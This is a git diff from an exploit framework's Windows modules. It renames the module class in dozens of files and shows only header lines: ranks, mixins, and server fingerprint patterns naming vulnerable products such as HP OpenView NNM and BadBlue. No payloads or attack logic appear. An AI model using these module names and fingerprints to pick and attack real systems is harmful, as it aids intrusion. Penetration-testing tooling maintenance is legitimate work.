b/modules/exploits/windows/games/ut2004_secure.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 0d3a53e3de..a4f19815f1 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 88bd797a13..330a09117d 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] } diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 7336b28f7b..62df0874e3 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 074f885b40..dc3171e2d5 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 4f305e2f1a..99a7f4e393 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 689f107920..d2f50d14d3 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3569fe8827..add74bc934 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ee569d496f..690467f2e8 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 64898f93cc..8ea6438d3a 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index ac84d2ff34..841642ef04 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 2119b57aab..f17d84ac56 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 6cf9e98863..e9fbfad2f7 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index df52e63683..58e78c7b8d 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a314fa36cf..0f139255d0 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 9f5251b4e1..05e2613719 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index c2bb5bdf61..4069ec878d 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index bc48f73fd8..9fa5c4cec3 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index d9efe9d560..2fb6931fe2 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Exploitation is reliable, but the service hangs and needs manual restarting. Rank = ManualRanking diff --git a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb index e0865db4c7..11dc34709f 100644 --- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb +++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 769d496259..4936809590 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index a0747c46a7..3ce543f576 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 5525b7fb10..ea7669bbee 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 079cdae430..ab88da7094 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c7ef5b6ee7..0def8e6474 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 7daa7bff70..9dd6288406 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index ff37a76faa..b6b34663cd 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 853bc561cd..6d763d06ed 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] } diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index c71ee36629..1ddad4cad6 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Reliable memory corruption include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ektron_xslt_exec.rb b/modules/exploits/windows/http/ektron_xslt_exec.rb index 3288d2c0d2..807f2ad8f2 100644 --- a/modules/exploits/windows/http/ektron_xslt_exec.rb +++ b/modules/exploits/windows/http/ektron_xslt_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a770467975..6693c11399 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb index 772d2e31aa..4b704d325e 100644 --- a/modules/exploits/windows/http/ezserver_http.rb +++ b/modules/exploits/windows/http/ezserver_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 6a396493ac..ba762f52b5 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" ) diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 949c22a1e0..0e80b7fef6 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index 82245bab7a..2e0e944341 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index eb447a6e35..4396f25703 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index f3366ccfbd..169532851f 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index a41ebf45b8..50e1585296 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 65ba7b2ac3..1049d6673b 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 4662a10c1d..2294c8b669 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index acc7ebc703..11a8dad538 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 87bf5d4ac7..da06017e88 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 5b04429e57..e219d739fc 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 5a5e8f9e58..241ec0cf1a 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 303a6aa930..edff3b0c55 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 867dd837c6..e709be8cf0 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index c0c7a84d27..8982d9bbbe 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index e9e798f40f..7981a0efbc 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index f546994531..cdb57c968e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 5b2d8df90d..8e7e3c1d2b 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index e653bcf3c1..6ac18869d3 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index 054d3c4090..bfe0674871 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index d2c98ea6ba..8632155f8a 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 18fbdce2b0..e6c8376f02 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index e233bfd79b..ebb5c95576 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 75609ae473..d53f58ec5b 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index 44464a26e7..37d8c6bd7d 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 5dec29805a..47d8108ede 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/OpenView.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 691934ac8e..20514989eb 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = 